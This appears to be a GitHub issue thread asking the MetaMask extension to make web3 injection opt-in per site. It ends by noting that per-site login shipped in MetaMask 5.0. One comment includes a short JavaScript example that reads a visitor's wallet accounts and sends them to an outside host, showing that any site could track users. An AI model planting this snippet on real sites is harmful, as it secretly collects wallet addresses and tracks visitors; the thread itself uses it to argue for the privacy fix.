Metamask-extension: privacy: option to enable injection on per-site basis

Related to #537.

Thanks @tmashuang - was searching for duplicates - but did not research back to 2016 - still keeping this open to improve visibility - thinking the issue from 2016 is buried to deep ;-)

Thinking about this a bit longer - perhaps there is an option to kill 2 birds with one stone here: a site could not only have metamask on/off as state - but also the network. I see myself switching between the different networks for different sites (usually these sites then only work with one network) - so when enabling a site to have web3 injection - metamask could also ask which network (main, rinkeby, ..) to use with this site.

MetaMask should have opt-in per-site basis. Otherwise, anyone could put this script on their site and start tracking visitors. I think regular users don't need to know about other networks. Once the user trusts site to see address in mainnet, why ask the same question for other networks, which can be also mainnets, just not Infura.

if (typeof web3 !== 'undefined' && typeof JSON !== 'undefined') {
    window.web3 = new Web3(web3.currentProvider);
    web3.eth.getAccounts(function(response,accounts) {
        if (accounts.length) {
            var script = document.createElement('script');
            script.src = 'https://example.com/?accounts=' + JSON.stringify(accounts);
            document.head.appendChild(script);
        }
    });
}

I expected that Metamask would only be showing my data if I unlock it, but still not the best, It should be a button per account to "enable it" in the site.

This is a privacy nightmare. The world is dicussing supercookies and fingerprinting and MetaMask willingly exposes sensitive data to every host asking for it?

Full discussion on this feature at #714

Log-in per site is implemented in https://github.com/MetaMask/metamask-extension/pull/4703 and released in MetaMask 5.0 as per EIP 1102.